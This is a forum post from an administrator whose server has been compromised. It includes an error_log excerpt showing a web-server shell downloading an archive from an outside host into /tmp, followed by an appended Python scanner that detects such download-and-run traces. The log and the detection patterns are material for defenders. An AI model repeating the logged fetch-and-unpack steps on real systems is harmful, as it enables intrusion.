Help! Hacker gaining access to the server!

Please help, any help would be really appreciated!

I have someone somehow getting into the server and spawning hundreds of processes, and I am unsure how he is doing it.

I found this in the error_log

cat: /tmp/sess_d68fb641e4e2ddb73c461a25e2039d2e: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
sh: fetch: command not found
--04:10:26-- http://4goofs.com/ad13/archive.tgz
=> `/tmp/abchy6/archive.tgz'
Resolving 4goofs.com... done.
Connecting to 4goofs.com[216.93.174.4]:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.4goofs.com/ad13/archive.tgz [following]
--04:10:26-- http://www.4goofs.com/ad13/archive.tgz
=> `/tmp/abchy6/archive.tgz'
Resolving www.4goofs.com... done.
Connecting to www.4goofs.com[216.93.174.4]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,661 [application/x-tar]

0K .......... .......... ....... 100% 103.66 KB/s

04:10:26 (103.66 KB/s) - `/tmp/abchy6/archive.tgz' saved [28661/28661]


gzip: stdin: unexpected end of file
tar: Child returned status 1
tar: Error exit delayed from previous errors

gzip: stdin: not in gzip format

The file in archive.tgz is a file called httpd.conf which seems to be the program that he is running, but I blocked 4goofs yesterday using iptables, and blocked all open ports... changed the port SSH runs on and made sure no-one else on the server had SSH.

I changed the upload directory for php, but this guy still has access to the server.

What else should I be doing???

Please help, thank you
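The error_log excerpt above is the fingerprint of a download-and-run sequence: a shell spawned by the web server tries `fetch`, falls back to `wget`, saves an archive under /tmp and unpacks it. As an added example that is not part of the original thread, the Python script below scans error_log text for exactly those indicators, run here on a constructed sample modelled on the post; the regexes and the list of scratch directories are my own assumptions, not a standard signature set.

```python
import re
from collections import defaultdict

# Constructed sample: lines modelled on the error_log in the post, plus one
# benign Apache line, so the scanner can be exercised offline.
SAMPLE_ERROR_LOG = """\
[notice] Apache/2.0.52 configured -- resuming normal operations
sh: fetch: command not found
--04:10:26-- http://4goofs.com/ad13/archive.tgz
=> `/tmp/abchy6/archive.tgz'
04:10:26 (103.66 KB/s) - `/tmp/abchy6/archive.tgz' saved [28661/28661]
gzip: stdin: not in gzip format
"""

# Indicators a defender looks for in a web server's error_log (assumed set):
# the server's sh looking for downloaders, files written into world-writable
# scratch directories, and archive extraction noise that follows a fetch.
SCRATCH_DIRS = r"(?:/tmp|/var/tmp|/dev/shm)"
PATTERNS = {
    "shell_cmd_missing": re.compile(r"^sh: (\w+): command not found"),
    "download_url": re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(\S+)"),
    "saved_in_scratch": re.compile(r"`(" + SCRATCH_DIRS + r"/[^']+)' saved"),
    "archive_noise": re.compile(r"^(?:gzip|tar): .+"),
}


def scan_error_log(text):
    """Return {indicator_name: [matched values]} for every line that looks
    like part of a shell-driven download into a scratch directory."""
    hits = defaultdict(list)
    for line in text.splitlines():
        for name, pat in PATTERNS.items():
            m = pat.search(line)
            if m:
                # Keep the captured value (command, URL, path) when the
                # pattern has a group, otherwise the whole offending line.
                hits[name].append(m.group(1) if m.groups() else line.strip())
    return dict(hits)


def looks_like_download_and_run(hits):
    """A fetched URL plus a file landing in a scratch directory is the
    combination worth paging on; either one alone is only suspicious."""
    return bool(hits.get("download_url")) and bool(hits.get("saved_in_scratch"))


if __name__ == "__main__":
    found = scan_error_log(SAMPLE_ERROR_LOG)
    for name, values in found.items():
        print(f"{name}: {values}")
    print("download-and-run pattern:", looks_like_download_and_run(found))
```

Because the download lines carry the URL and the destination path, the same output tells you which host to block egress to and which directory to inspect for the dropped binary.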
